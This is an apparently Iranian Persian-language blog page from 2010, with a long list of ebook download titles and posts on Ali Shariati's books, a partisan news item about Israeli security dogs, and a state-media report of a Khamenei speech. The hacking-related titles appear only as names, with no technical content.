دانلود کتاب : افسردگی در بیماران با آسیب نخاعی

دانلود کتاب : آشنایی با بیماری هپاتیت

دانلود کتاب : تفسیر بیان السعاده فی مقامات العباده

دانلود کتاب : تفسیر بیان السعاده فی مقامات العباده

دانلود کتاب : سنگ‌های ادراری در بیماران نخاعی (ویژه پزشکان)

دانلود کتاب : سنگ‌های ادراری در بیماران نخاعی (ویژه پرستاران)

اندیشکده ایران و یونان به کوشش سیمین کوثری

کتاب برانگیختگان نوشته جعفر معروفی

دانلود کتاب : آموزش میکروکنترولر PIC

دانلود کتاب : کوچه خلوت، شش داستان کوتاه

دانلود کتاب : جوشن کبیر

دانلود کتاب : آموزش سریع میکروکنترولر AVR

دانلود کتاب : همراه با راستگویان

دانلود کتاب : پیمایش رضایت مشتری

رازدانی و روشنفکری و دینداری

دانلود کتاب : تاریخ طبری (تاریخ الرسل و الملوک)

دانلود کتاب : ترجمه قرآن کریم

دانلود کتاب : جنون گاوی

دانلود کتاب : چگونه می‌توان مخترع شد؟

قواعد کدنویسی در فلش (Action Scripting in Flash)

دانلود کتاب : آموزش کرک (Crack)

دانلود کتاب : فراموشی

دانلود کتاب : متافیزیک

دانلود کتاب : گزیده ای از مصباح الهدی (حاج اسماعیل دولابی ره)

دانلود کتاب : گزیده ای از کیمیای محبت

دانلود کتاب : راهنمای استفاده از MatLab

مقاله (برنامه نویسی پوسته لینوکس)

ترجمه قرآن کریم

دانلود کتاب : مرجع کامل آموزش زبان PHP

برگردان مرزبان نامه به پارسی سره

دانلود کتاب : خود هیپنوتیزم

دانلود کتاب : آشنایی با زبان #C

دانلود کتاب : جوانی

دانلود کتاب : هفت بزم بهرام گور

دانلود کتاب : قانون چک

دانلود کتاب : هری پاتر و قدیسان مرگ

دانلود کتاب : حماسه‌های پهلوانی

دانلود کتاب : کاکتوس‌ها هم عاشق می‌شوند

دانلود کتاب : آنابولیسم در ورزش‌های قدرتی

دانلود کتاب : وردی که بره‌ها می‌خوانند

دانلود کتاب : منم کوروش شهریار روشنایی ها

دانلود کتاب : سفرنامه جنوب ایتالی

دانلود کتاب : نگاه انسانی درباره ادبیات وزن

دانلود کتاب : تاریخچه و شناسنامه مطبوعات قرآنی

دانلود کتاب : آموزش Power Point 97

دانلود کتاب : هنر استدلال

دانلود کتاب : بویی که سرهنگ را دلباخته کرد

دانلود کتاب : تمایلات جنسی کودکان و نوجوانان

دانلود کتاب : لمعات الحسین

دانلود کتاب : چهار رنگ

دانلود کتاب : گزیده‌هایی از مثنوی

دانلود کتاب : گل آقا لچه گورابی

دانلود کتاب : داستان‌های قرآن کریم

دانلود کتاب : ساختار زبان الگو

دانلود کتاب : در همسایگی حوض کاشی پادشاهان

دانلود کتاب : آذری: یا زبان باستانی آذربایجان

دانلود کتاب : خسرو و شیرین

دانلود کتاب : هری پاتر و جام آتش

دانلود کتاب : انقلاب ایران و سقوط پادشاهی

دانلود کتاب : میترایسم، مهر و مهرپرستی

دانلود کتاب برای موبایل

دانلود همسران رضاشاه


دانلود کتاب : ملاحضات در مورد سازمان

دانلود کتاب : اپیدمیولوژی بالینی و کنترل بیماریهای مرتبط با بیوتروریسم

دانلود کتاب : 4 سوال شایع خانم ها در باره عشق و حسادت

دانلود کتاب : ادبیات فولکلور ایران

دانلود کتاب : درباره ادبیات داستانی معاصر ایران

دانلود کتاب : نگاه به ادبیات کودکان از دید صمد بهرنگی

دانلود کتاب : قسمت عمده ادبیات باستانی مصر ادبیات دینی است!

دانلود کتاب : ادبیات روزهای ماقبل تاریخ

دانلود کتاب : شاد زیستن

دانلود کتاب : نقد و بررسی داستانهای شهلا پروین روح

دانلود کتاب : دکتر عباس پژمان

خلاصه 19 رمان فارسی

دانلود کتاب : نقد هنری

یأس فلسفی

دانلود کتاب : نگین های ارغوانی

آه از بی زادی و درازی راه

دانلود کتاب : دیوان رباعیات ابو سعید ابوالخیر

دانلود کتاب : ادبیات و شبه مدرنیته ایرانی

آشنایی با احمد سروش

اهورا مزدا و اهریمن در اساطیر کهن

دانلود کتاب : گزیده ای از اشعار (مهدی اخوان ثالث)

نامه به / از رویا و ضمائم پاره وقت

دانلود کتاب : شگفتی های زیست شناسی

حمام معروف شیخ بهائی

دانلود کتاب : شما با مشکلات روزمره چگونه برخورد می کنید؟

شما میوه کدام درخت هستید؟

دانلود کتاب : شروع دوستی

دانلود کتاب : System Architecting

تفسیر کلمه ذکر و اهل ذکر

دانلود کتاب : طالع بینی ابجد با نام

دانلود کتاب : تقویت قوه تخیل

دانلود کتاب : تقسیم بندی ساعات شبانه روز در دعا نویسی

دانلود کتاب : نرم افزار آزاد چیست؟

دانلود کتاب : یک یا دوهزار و یک؟

دانلود کتاب : 8 نکته مهم در بابت استفاده از ایمیل

دانلود کتاب : پندار

دانلود کتاب : اسرار گنج دره جنی

دانلود کتاب : از عشق و شیاطین دیگر

دانلود کتاب : براند

دانلود کتاب : 10 نکته در کار با فایل ها

دانلود کتاب : 10 دلیل مهم برای نصب XP Service Pack 2

دانلود کتاب : 12 ترفند کاربردی و مفید

دانلود کتاب : 13 روش برای بالا بردن امنیت در یاهو

دانلود کتاب : هوارد کارتر جستجوگر بزرگ

دانلود کتاب : سه روايت از يك مرد

دانلود کتاب : شانه هاى خاك

دانلود کتاب : هاری پاتر و تالار اسرار

دانلود کتاب : عزاداران بیل

دانلود کتاب : از این ولایت

دانلود کتاب : جانوران شگفت انگیز و زیستگاه آنها

دانلود کتاب : هاينريش بل و نويسنده ايرانی

دانلود کتاب : چاه بابل

دانلود کتاب : چهل پنجره

دانلود کتاب : داستان عشق

دانلود کتاب : در گریز گم می شویم

دانلود کتاب : هاری پاتر و زندانی آزکابان

دانلود کتاب : شب وحشتناک

دانلود کتاب : 13 داستان از جلال آل احمد

دانلود کتاب : 25 داستان باستانی

دانلود کتاب : داستانهای 1001 شب

دانلود کتاب : چهل داستان درباره نماز و نمازگزاران

دانلود کتاب : 181 داستان

دانلود کتاب : 72 داستان

دانلود کتاب : 88 داستان

دانلود کتاب : 102 داستان

دانلود کتاب : هشتمين پسر

دانلود کتاب : هفت داستان کوتاه

دانلود کتاب : 150 داستان

دانلود کتاب : آفرینش از روز نخست تا روز هشتم

دانلود کتاب : آدم و حواي ايراني

دانلود کتاب : مجموعه ای از اشعار

دانلود کتاب : ایرج میرزا

دانلود کتاب : دیوار

دانلود کتاب : دزده و مرغ فلفلی

دانلود کتاب : مجموعه چند آموزش

دانلود کتاب : مجموعه چند ترفند ویندوزی

دانلود کتاب : چندین مطلب مفید و اطلاعات عمومی درباره کامپیوتر

دانلود کتاب : Get Going with Excel 95

دانلود کتاب : Get going with Excel 2000

دانلود کتاب : آموزش قدم به قدم هک

دانلود کتاب : Javascript for beginners

دانلود کتاب : راهنمای ساخت ایمیل در یاهو

دانلود کتاب : بررسی داستان آدم های مشهور

دانلود کتاب : آیین های مداوا

دانلود کتاب : افسانه زندگان

دانلود کتاب : افسانه سیزیف

دانلود کتاب : زندگینامه احمد محمود

دانلود کتاب : آلفرد نوبل- چهره های تاریخ

دانلود کتاب : معرفی فریدون مشیری

دانلود کتاب : معرفی آنا آندریونا گورنکو

دانلود کتاب : اشک لیلی

دانلود کتاب : اسیر

دانلود کتاب : از آتش ...!

دانلود کتاب : یک شعر کوتاه آزادی

دانلود کتاب : در كوچه ھاي آتن

دانلود کتاب : چند مطلب دانستنی همراه با شعر

دانلود کتاب : دشت سترون و اشعار دیگر

دانلود کتاب : درد دلهای گلاره

دانلود کتاب : توتالیتاریسم

دانلود کتاب : احکام عملی قرآن

دانلود کتاب : مجموعه کلمات عوامانه فارسی

دانلود کتاب : سه ماهی

دانلود کتاب : 6 روش برای زنی که به همسرش وابسته است

دانلود کتاب : ابو نصر فارابی

دانلود کتاب : آداب نوروزی، آنها که ماند و آنها که فراموش شد

دانلود کتاب : فرشتگان و شياطين

دانلود کتاب : مجموعه اي از داستان هاي كوتاه و متون عاطفي

دانلود کتاب : راهنمای فایلهای HTML

دانلود کتاب : چند نمونه ترفند کامپیوتری بسیار جالب

دانلود کتاب : سربارگذاری عملگرها در #C برای کلاسها و داده ها

دانلود کتاب : نحوه قرار دادن عکس در وبلاگهای Blogger

دانلود کتاب : ایران و گروه عقب ماندگان IT دنیا!!

دانلود کتاب : گزيده 2 داستان کوتاه

دانلود کتاب : سه تار

دانلود کتاب : سه نظر درباره یک مرگ

دانلود کتاب : نمایشنامه پریا

دانلود کتاب : اما زونز

دانلود کتاب : اسطوره ها

دانلود کتاب : نیمه تاریک ماه

دانلود کتاب : ابو لؤلؤ و ترور عمر

دانلود کتاب : ابو علی سینا

دانلود کتاب : جرج سارتن و ابو علی سینا

دانلود کتاب : ابوالحسن صبا

دانلود کتاب : دکتر عبدالحسین زرین کوب

دانلود کتاب : خواجه عبدالله انصاری

دانلود کتاب : تاریخ نویس 12 ساله

دانلود کتاب : دو نوبل در داستان یک زن

دانلود کتاب : ساخت یک حلزون با مقوا و کاغذ

دانلود کتاب : ساخت یک قورباغه با مقوا و کاغذ

دانلود کتاب : سه برادر روایت اول

دانلود کتاب : ساخت یک ماسک ترسناک

دانلود کتاب :2 پر 2 پر 4 پر

دانلود کتاب : خط شناسی

دانلود کتاب : مجموعه چند نقشه برای کاردستی

دانلود کتاب : 100 وسیله برای نصرت و یاری رسول الله

دانلود کتاب : 82 پرسش از قرآن

دانلود کتاب : پنجاه درس اصول عقائد برای جوانان

دانلود کتاب : چهل و دو حدیث (اربعون نووی)

دانلود کتاب : چهل حدیث پیرامون غدیر

دانلود کتاب : چهل حدیث از حضرت ابا عبدالله الحسین (ع)

دانلود کتاب : چهل حدیث در احکام بانوان

دانلود کتاب : چهل گام

دانلود کتاب : فقه و زندگی (2)

دانلود کتاب : یازده دستورالعمل از آیة الله بهجت

دانلود کتاب : ده شرط سلوک

دانلود کتاب : هفتاد و دو مسئله از مسائل عمره مفرده

دانلود کتاب : احکام نوجوانان

انلود کتاب : لحظه هاى آسمانى

دانلود کتاب : منظومه درفش کاویان

دانلود کتاب : ایمان بیاوریم به آغاز فصل سرد

دانلود کتاب : چند نمونه از اشعار کودکانه

دانلود کتاب : بیداری

دانلود کتاب : بازخوانی شعر برج ایسناخار

دانلود کتاب : برف گُلِ ياس

دانلود کتاب : برف گُلِ ياس

دانلود کتاب : شعری بنام جهنم

دانلود کتاب : از این اوستا

دانلود کتاب : دیوان اشعار ابوالقاسم لاهوتی

دانلود کتاب : دیوان حافظ

دانلود کتاب : زندگی آلفرند نوبل و جایزه های او

دانلود کتاب : دیوان خورشید

دانلود کتاب : زندگینامه آلکساندر پوشکین

دانلود کتاب : زندگینامه الکسندر سولژنیتسین

دانلود کتاب : زندگینامه مهدی اخوان ثالث (م.امید)

دانلود کتاب : افلاطون

دانلود کتاب : ایران در هزاره اول قبل از میلاد مسیح

دانلود کتاب : آموزش بکارگیری برنامه outlook

دانلود کتاب : راهنمای نرم افزار نت ساپورت

دانلود کتاب : Get Going with INTERNET

دانلود کتاب : آموزش اینترنت به زبان ساده

دانلود کتاب : چند آموزش ساده و کاربردی

دانلود کتاب : آموزش کامل HTML

دانلود کتاب : جنگ و صلح در سرزمین رئالیسم

دانلود کتاب : چگونه سایت خود را چسبانک کنیم!

دانلود کتاب : انسان

دانلود کتاب : سرزمینی که وجود ندارد

دانلود کتاب : تهذیب و تنقیح و گزینش گلستان سعدی

دانلود کتاب : سروده های زرتشت

دانلود کتاب : شاهنامه فردوسی

دانلود کتاب : فردیت محال

دانلود کتاب : مثل هيچ کس

دانلود کتاب : يا تو يا هيچ کس

دانلود کتاب : عصر نوين جنگ

دانلود کتاب : عدد 666

دانلود کتاب : آیین بودا

دانلود کتاب : آئین مانی

دانلود کتاب : اقلیت های دینی

دانلود کتاب : احکام نوجوانان 2

دانلود کتاب : احکام روابط زن و مرد

دانلود کتاب : احکام پزشکی

دانلود کتاب : اهل حق

دانلود کتاب : خداوند فروهر و زندگی بخش یگانه

دانلود کتاب : عجم و معنی آن

دانلود کتاب : چهار داستان طنز

دانلود کتاب : 117 داستان

دانلود کتاب : ص.ص.م ، از هفت تا نه و نیم

دانلود کتاب : چرا به آقای ص.ص.م پاسخ نمی گویید

دانلود کتاب : داستانهایی کوتاه از ابوالفضل زرویی نصرآباد

دانلود کتاب : افسانه درخت خرما و بزی

دانلود کتاب : ترا من دوست ...

دانلود کتاب : و من آگاه خواهم گفت

دانلود کتاب : من و دیگران

دانلود کتاب : زندگینامه احمد بهمنیار

دانلود کتاب : استثناء و قاعده

دانلود کتاب : فراسوی ذهنم

دانلود کتاب : گاو

دانلود کتاب : گاواره بان

دانلود کتاب : هاری پاتر و زندانی آزکابان

دانلود کتاب : حکایتی از 18 اردیبهشت 1325

دانلود کتاب : صندلی کنار پنجره بگذاریم و بنشینیم و ...

دانلود کتاب : هنر نبرد

دانلود کتاب : هتل تهران

دانلود کتاب : جایی میان آفتاب و سایه

دانلود کتاب : زندگی تولستوی

دانلود کتاب : حقوق بشر از آدم تا حوا

دانلود کتاب : فقه و زندگی (1)

دانلود کتاب : توتالیتاریسم

دانلود کتاب : لحظه هاى آسمانى

دانلود کتاب : احکام نوجوانان

دانلود کتاب : هفتاد و دو مسئله از مسائل عمره مفرده

دانلود کتاب : ده شرط سلوک

دانلود کتاب : نمایشنامه گلهای شمعدانی

دانلود کتاب : گور و گهواره

دانلود کتاب : حقوق بشر از آدم تا حوا

دانلود کتاب : انرژی هسته ای حق ایران است!

دانلود کتاب : فرهنگ ریشه شناختی اختر شناسی

دانلود کتاب : سيمای خانوادگی خاندان چرچيل

دانلود کتاب : فقه و زندگی (1)

دانلود کتاب : زندگی تولستوی

دانلود کتاب : جایی میان آفتاب و سایه

دانلود کتاب : هتل تهران

دانلود کتاب : هنر نبرد

دانلود کتاب : صندلی کنار پنجره بگذاریم و بنشینیم و ...

دانلود کتاب : حکایتی از 18 اردیبهشت 1325

دانلود کتاب : گسل

دانلود کتاب : سيمای خانوادگی خاندان چرچيل

دانلود کتاب : فرهنگ ریشه شناختی اختر شناسی

دانلود کتاب : انرژی هسته ای حق ایران است!

دانلود کتاب : گسل

دانلود کتاب : گور و گهواره

دانلود کتاب : نمایشنامه گلهای شمعدانی

دانلود کتاب : خرمگس

دانلود کتاب : قرمز و دیگران

دانلود کتاب : افسانه گیلگمش

دانلود کتاب : هاری پاتر و کیمیاگر برج

دانلود کتاب : عشقبازی ناپلئون


دانلود کتاب : موشها و آدمها

دانلود کتاب : منطق الطیر

دانلود کتاب : ما بسیاریم

دانلود کتاب : آیین نامه طراحی میانای کاربر گرافیکی فارسی

دانلود کتاب : جوان خام

دانلود کتاب : فقر فلسفه

دانلود کتاب : هفتاد حکایت داستانی برگزیده از گلستان سعدی

دانلود کتاب : آشفتگی جنسیتی

دانلود کتاب : خاطرات آدم و حوا

دانلود کتاب : سقراط مجروح

دانلود کتاب : مصباح الشریعه

دانلود کتاب : فاطمه فاطمه است

دانلود کتاب : از شریعتی

دانلود کتاب : میکروکنترولرها

دانلود کتاب : نیازهای انسان امروز

دانلود کتاب : پدر، مادر ما متهمیم

دانلود کتاب : GSM سامانه فراگیر برای تلفن همراه

دانلود کتاب : پیروان علی و رنجهایشان

دانلود کتاب : مرجع کامل رجیستری ویروس نویسان

دانلود کتاب : سلمان پاک

دانلود کتاب : تشیع علوی، تشیع صفوی

دانلود کتاب : تجدد یا تمدن

دانلود کتاب : یک، جلوش تا بینهایت صفرها

دانلود کتاب : توانبخشی آسیب طناب نخاعی

دانلود کتاب : بولداگ

دانلود کتاب : بوستان

دانلود کتاب : ترور، آیین دجال

دانلود کتاب : آدم کش‌ها

دانلود کتاب : ابزار تشخیص امواج رادیویی

دانلود کتاب : قانون معادن در ایران

دانلود کتاب : نظام آموزشی لیبی

دانلود کتاب : آن گاه هدایت شدم

دانلود کتاب : فیلم سازی مستند را تجربه کنید

دانلود کتاب : نظام آموزشی جمهوری اسلامی ایران

دانلود کتاب : مبانی دیجیتال

دانلود کتاب : آموزش Protel 99

دانلود کتاب : نوح آموز

دانلود کتاب : مجموعه اشعار

دانلود کتاب : آینه های ناگهان (مجموعه اشعار)

دانلود کتاب : دعای افتتاح

دانلود کتاب : دست پنهان

دانلود کتاب : مجموعه کلمات عوامانه فارسی

دانلود کتاب : داستانهای شگفت انگیز از زیارت عاشورا

دانلود کتاب : آشنایی با مفاهیم و اصطلاحات اینترنتی

دانلود کتاب : خاطرات دلبرکان غمگین من

دانلود کتاب : چیکده ای از روانشناسی اجتماعی

دانلود کتاب : نفوذ به شبکه‌های بی‌سیم

دانلود کتاب : آموزش قدم به قدم هک

دانلود کتاب : آموزش مقدماتی کامپیوتر

دانلود کتاب : زندگی‌نامه‌ی تولستوی

دانلود کتاب : رباعیات خیام

دانلود کتاب : نظام آموزشی آمریکا

دانلود کتاب : راهنمای استفاده از مدیر وب مین

دانلود کتاب : سه اسلام

دانلود کتاب : شعر بی شراب

دانلود کتاب : نظام آموزشی ژاپن

دانلود کتاب : نظام آموزشی ایتالیا

دانلود کتاب : مفاهیم پایه IT

دانلود کتاب : آشنایی با تعاریف سیستم های نرم افزاری و شبکه (اینترنت و شبکه)

دانلود کتاب : نظام آموزشی یونان

دانلود کتاب : نظام آموزشی فرانسه

دانلود کتاب : نظام آموزشی فنلاند

دانلود کتاب : آشنایی با تعاریف سیستم های نرم افزاری و شبکه (امنیت شبکه)

دانلود کتاب : آموزش PHP

دانلود کتاب : آموزش لینوکس (Red Hat 9)

دانلود کتاب : نظام آموزشی انگلستان

دانلود کتاب : نظام آموزشی امارات

دانلود کتاب : نظام آموزشی قبرس

دانلود کتاب : تبیین جهان و انسان

دانلود کتاب : سجاد لشکر

گذری بر جامعه شناسی شناخت

دانلود کتاب : مقدمه ای بر سی شارپ (#C)

دانلود کتاب : نظام آموزشی کانادا

دانلود کتاب : نظام آموزشی بلغارستان

دانلود کتاب : نظام آموزشی اتریش

دانلود کتاب : نظام آموزشی استرالیا

دانلود کتاب : دیجیتال (کتاب درسی)

اصول تکنیک ای جکس (Ajax)

دانلود کتاب : عربی

دانلود کتاب : عقل سرخ

دانلود کتاب : آشنایی با مجوزهای نرم افزارهای آزاد/متن باز

دانلود کتاب : مستان سلام ات میکنند

دانلود کتاب : مجموعه مقاله (پیرامون کربلا)

دانلود کتاب : سروهای سرخ

دانلود کتاب : سند و فضیلت زیارت عاشورا

دانلود کتاب : جامعه شناسی تحریفات عاشورا

دانلود کتاب : راهنمای کار با پایگاه داده PosterSQL

دانلود کتاب : مهر فروزان

دانلود کتاب : یاد یار (خاطرات شهدا باکری، چمران و کاوه)

دانلود کتاب : مجموعه مقاله (پیرامون کربلا)

دانلود کتاب : شبهای ورامین

دانلود کتاب : مقاله در جستجوی حقیقت

دانلود کتاب : راهنمای سریع استفاده از پایگاه داده MySQL

دانلود کتاب : آشنایی با شبکه خصوصی مجازی VPN

دانلود کتاب : حج عمره

دانلود کتاب : مجموعه مقاله

دانلود کتاب : ما عاشقان مرداب

دانلود کتاب : راهنمای مهاجرت به نرم افزارهای آزاد/متن باز

<
کیانوش انصاری بازدید : 143 دوشنبه 26 مهر 1389 نظرات (0)

درباره ی دکتر علی شریعتی (اندیشه های استاد)

دکتر علی شریعتی

 

وصینامه دکتر علی شریعتی

کتاب ( کویر ) .: دانلود :. حجم : 1.16 مگابایت
کتاب ( تشیع علوی ؛ تشیع صفوی ) .: دانلود :. حجم : 675 کیلوبایت
کتاب ( علی حقیقتی بر گونه اساطیر ) .: دانلود :. حجم : 292 کیلوبایت
کتاب ( آری این چنین بود برادر ) .: دانلود :. حجم : 199 کیلوبایت
کتاب ( علی مکتب واحد عدالت ) .: دانلود :. حجم : 423 کیلوبایت
کتاب ( بازگشت خویشتن ) .: دانلود :. حجم : 237 کیلوبایت
کتاب ( گیاه شناسی ) .: دانلود :. حجم : 45 کیلوبایت
کتاب ( پدر ،مادر ، ما متهمیم ) .: دانلود :. حجم : 235 کیلوبایت
کتاب ( اگر مارکس و پاپ نبودند ) .: دانلود :. حجم : 120 کیلوبایت
کتاب ( مذهب علیه مذهب ) .: دانلود :. حجم : 4.60 مگابایت
کتاب ( نیازهای انسان امروز) .: دانلود :. حجم : 227 کیلوبایت
کتاب ( پیروان علی و رنجهایشان ) .: دانلود :. حجم: 199 کیلوبایت
کتاب ( سوره روم ، پیام امید به روشنفکر مسئول) .: دانلود :. حجم : 345 کیلوبایت
کتاب ( شهادت ) .: دانلود :. حجم : 99 کیلوبایت
کتاب ( روش برداشت از قرآن ) .: دانلود :. حجم : 570 کیلوبایت
کتاب ( سلمان پاک نوشته لویی ماسنیون ترجمه دکتر علی شریعتی ) .: دانلود :.
کتاب ( یک جلوش ، تا بینهایت صفرها ) .: دانلود :. حجم : 97 کیلوبایت

استاد علی شریعتی

کیانوش انصاری بازدید : 132 دوشنبه 26 مهر 1389 نظرات (0)
رژيم صهيونيستي اسرائيل براي مقابله با موج فزاينده اسلام خواهي در فلسطين و آزادي قدس شريف، اقدام به تربيت سگ هايي كرده است فلستین، اسرائیل

كه فلسطيني هاي معترض در تظاهرات را كه شعار الله اكبر سرمي دهند دنبال و دستگير كنند.

به گزارش پايگاه اينترنتي روزنامه «القدس»، سگ هاي اسرائيلي طوري تربيت شده اند كه هر كس كلمه مبارك الله اكبر را بر زبان بياورد از دست آنها در امان نخواهد بود.

«احمد الطيبي» نماينده عرب كنست (پارلمان) اسرائيل در اعتراض به اين موضوع خطاب به نمايندگان صهيونيست گفت: ببينيد به كجا رسيديد و چقدر

سقوط كرده ايد؟! وي خطاب به يكي از آنها گفت: صورت خود را از خجالت مي پوشانيد، اما به جاي آن همه شما بايد صورت خود را از اعمال ارتش خودتان بپوشانيد.


دكتر الطيبي خطاب به صهيونيست ها گفت: از كلمه الله اكبر مي ترسيد و تلاش مي كنيد آنها را محدود كنيد، من به شما مي گويم، الله اكبر عليه شما. او در حالي كه به شدت عصباني شده بود گفت: آيا در ميان شما سگي هست كه مرا گاز بگيرد؟!

کیانوش انصاری بازدید : 132 دوشنبه 26 مهر 1389 نظرات (0)
رهبری خطاب به افراد داخل نظام:

رهبر معظم انقلاب سید علی خامنه ای

دو پهلو حرف زدن خواص كمك به فتنه دشمن است

نسل جوان كنونی بسیار بهتر و هوشمندانه‌تر عمل می‌كند

رهبر معظم انقلاب اسلامی تاكید كردند: هنگامی كه عده ای در فضای فتنه و غبارآلودگی، با زبان، اسلام را نفی و در عمل نیز جمهوریت نظام را نفی می كنند و انتخابات را زیر سؤال می برند، انتظار از خواص این است كه مرز و موضع خود را شفاف مشخص كنند.

به گزارشرجانیوز به نقل از پایگاه اطلاع‌رسانی رهبر معظم انقلاب، حضرت آیت الله خامنه‌ای رهبر انقلاب اسلامی امروز در دیدار مسئولان شورای هماهنگی تبلیغات اسلامی و رؤسای ستادهای دهه فجر سراسر كشور، مهمترین ویژگی انقلاب اسلامی ایران و مراسم سالگرد انقلاب در سی سال گذشته را حضور انبوه و متحد مردم به عنوان عناصر اصلی شكل گیری انقلاب اسلامی و دلبستگی آنان به شعارهای اساسی انقلاب دانستند و تأكید كردند: در دوران فتنه و غبارآلود بودن فضا، وظیفه همه بویژه خواص، موضع گیری شفاف و پرهیز از سخنان و مواضع دو پهلو است.

رهبر انقلاب اسلامی دهه فجر را یك پدیده منحصر بفرد برشمردند و در تبیین این موضوع افزودند: علت منحصر بفرد بودن دهه فجر این است كه در طول سی سال گذشته، سالگرد انقلاب اسلامی همواره با حضور انبوهِ مردمی بوده كه عناصر اصلی پدید آورنده انقلاب هستند.

حضرت آیت الله خامنه‌ای حضور میلیون‌ها نفر در 22 بهمن هر سال را نشانه متكی بودن انقلاب به ایمان‌های مردم دانستند و خاطرنشان كردند: معنای این حضور انبوه و منسجمِ هر ساله این است كه انقلاب اسلامی و نظام برخاسته از آن، متكی بر مردم و ایمان آنان است و علت اصلی ناتوانی دشمنان در متزلزل كردن نظام اسلامی نیز همین موضوع است.

ایشان با اشاره به وحشت مخالفان نظام اسلامی، از این حضور خالص و گسترده مردمی با گرایشها و سلایق مختلف، در مناسبتهای گوناگون انقلاب به ویژه دهه فجر و 22 بهمن افزودند: دشمنان برای سرپوش گذاشتن بر این انسجام و وحدت تلاش دارند، با كمك عوامل خود، و در تبلیغات اینگونه وانمود كنند كه انسجام و جهت گیری واحد مردم دچار انشقاق و چند دستگی شده است.

رهبر انقلاب اسلامی خاطرنشان كردند: در همین چارچوب در روز قدس كه پایه و اساس آن در ضدیت با رژیم صهیونیستی است، گروهی معدود و فریب خورده، بر ضد موضوع فلسطین و به نفع رژیم صهیونیستی شعار دادند و در روز سیزده آبان نیز كه روز برائت و نفرت ملت ایران از استكبار امریكایی است، بر ضد این حركت و نظام اسلامی و اسلامیت شعار دادند.

حضرت آیت الله خامنه ای با تأكید بر اینكه ملت ایران دلبسته به شعارهای اساسی انقلاب اسلامی است و عظمت ملت ایران نیز به بركت حضور مردمی در صحنه است، افزودند: جمهوری اسلامی با خواست و ایمان مردم شكل گرفته و تاكنون براساس همین خواست و ایمان با كمال اقتدار و احساس عزت و بی نیازی پیش رفته و از این پس نیز با اقتدار و عزت كامل بر همه دشمنان پیروز خواهد شد.

ایشان تأكید كردند: انقلاب اسلامی یك حقیقت برخاسته از سنت الهی است و تا هنگامی كه متكی بر ایمان، عشق و علاقه مردم است، قدرتهای جهانی اگر با یكدیگر نیز متحد شوند نمی توانند صدمه ای به این انقلاب و مردم وارد كنند.

حضرت آیت الله خامنه ای، 22 بهمن را متعلق به ملت ایران، امام بزرگوار (ره)، و شهدا دانستند و تأكید كردند: دشمن تلاش دارد این ثروت عظیم ملی را متزلزل كند، بنابراین باید با تمام قوا در صحنه بود و عاقلانه و مدبرانه حركت كرد.

رهبر انقلاب اسلامی شناخت "لحظه و نیاز " و اقدام متناسب با آن را یك خصوصیت و ویژگی بسیار مهم برشمردند و خاطرنشان كردند: برخی از اهالی كوفه كه با عنوان "توابین " چند ماه بعد از حادثه عاشورا قیام كردند و به شهادت رسیدند، به امام حسین (ع) ایمان داشتند و انشاءالله در نزد خداوند هم مأجور هستند اما آن وظیفه ای را كه باید عمل می كردند، انجام ندادند زیرا "لحظه " و عاشورا را نشناختند.

ایشان، نهم دی امسال را یكی از "لحظه ها " دانستند و تأكید كردند: راهپیمایی نهم دی، نیاز لحظه ها بود كه شورای هماهنگی تبلیغات اسلامی به درستی اقدام كرد و مردم نیز بخوبی این نیاز را تشخیص دادند و 9 دی به یكی از قله های تاریخ انقلاب اسلامی تبدیل شد.

حضرت آیت الله خامنه ای 23 تیر سال 78 را نیز یكی دیگر از "لحظه ها " برشمردند و خاطرنشان كردند: راهپیمایی مردم در 22 بهمن با همه عظمتی كه دارد، یك كار متعارف و دارای روال مشخص است اما راهپیمایی 23 تیر سال 78 و نهم دی امسال، یك كار متعارف نبود.

رهبر انقلاب اسلامی تأكید كردند: شناخت موقعیت، و حضور در لحظه مناسب و مورد نیاز، اساس همه كارها است.

ایشان، موضع گیری شفاف و پرهیز از مواضع مبهم و دو پهلو را یكی از نیازهای مهم دوران فتنه و غبارآلودگی فضا دانستند و افزودند: دشمنان همواره مخالف شفاف بودن فضا هستند زیرا آنها در فضای غبار آلود و فتنه می توانند به اهداف خود برسند.

حضرت آیت الله خامنه ای تأكید كردند: در شرایط كنونی همه جریانها و گرایش های سیاسی داخل نظام باید خط و مرز خود را با دشمن به صورت شفاف مشخص كنند و در این میان وظیفه خواص بویژه خواصی كه تأثیرگذاری بالایی دارند، بیش از دیگران است.

رهبر انقلاب اسلامی خاطرنشان كردند: موضع گیری دو پهلوی خواص مطلوب نیست و خواص باید مواضع خود را در قبال سخنان و اقدامات دشمن، شفاف بیان كنند.

ایشان افزودند: وقتی سران استكبار و ظلم، و اشغالگران كشورهای اسلامی وارد میدان می شوند و موضع گیری می كنند، دو پهلو و مبهم سخن گفتن صحیح نیست زیرا باید مشخص شود، افرادی كه داخل نظام جمهوری اسلامی هستند، چه موضعی دارند و آیا حاضر هستند از دشمن تبری بجویند؟

حضرت آیت الله خامنه ای خاطرنشان كردند: هنگامی كه عده ای در فضای فتنه و غبارآلودگی، با زبان، اسلام را نفی و در عمل نیز جمهوریت نظام را نفی می كنند و انتخابات را زیر سؤال می برند، انتظار از خواص این است كه مرز و موضع خود را شفاف مشخص كنند.

ایشان تأكید كردند: شفاف سازی، دشمنِ دشمن و غبارآلودگی كمك به دشمن است و این، یك شاخص و معیار برای عملكرد همه افراد و جریانها و به ویژه خواص است.

حضرت آیت الله خامنه ای با اشاره به توطئه هایی كه در سی سال گذشته بر ضد انقلاب اسلامی وجود داشته است، افزودند: ملت ایران تاكنون با لطف و عنایت خداوند از گذرگاههای بسیار سختی عبور كرده است و از این پس هم عبور خواهد كرد.

رهبر انقلاب اسلامی با تأكید بر اینكه دشمنی ها با نظام اسلامی همچون گذشته در آینده نیز ادامه خواهد داشت، خاطرنشان كردند: اگر ملتی بیدار، آگاه، با عزم و متكی بر ایمان و همراه با رویش باشد بر همه توطئه ها غلبه خواهد كرد.

ایشان با اشاره به رویش های انقلاب افزودند: نسل جوان كنونی و جوانانی كه حتی پیروزی انقلاب اسلامی و مقاطع مهم آن را ندیده اند، نوخاسته ها و رویش های انقلاب هستند كه در مقایسه با نسل جوان اول انقلاب، بسیار بهتر و هوشیارانه تر عمل می كند.

حضرت آیت الله خامنه ای تأكید كردند: با وجود همه توطئه ها، برگ و بار درخت مستحكم انقلاب روزافزون است.

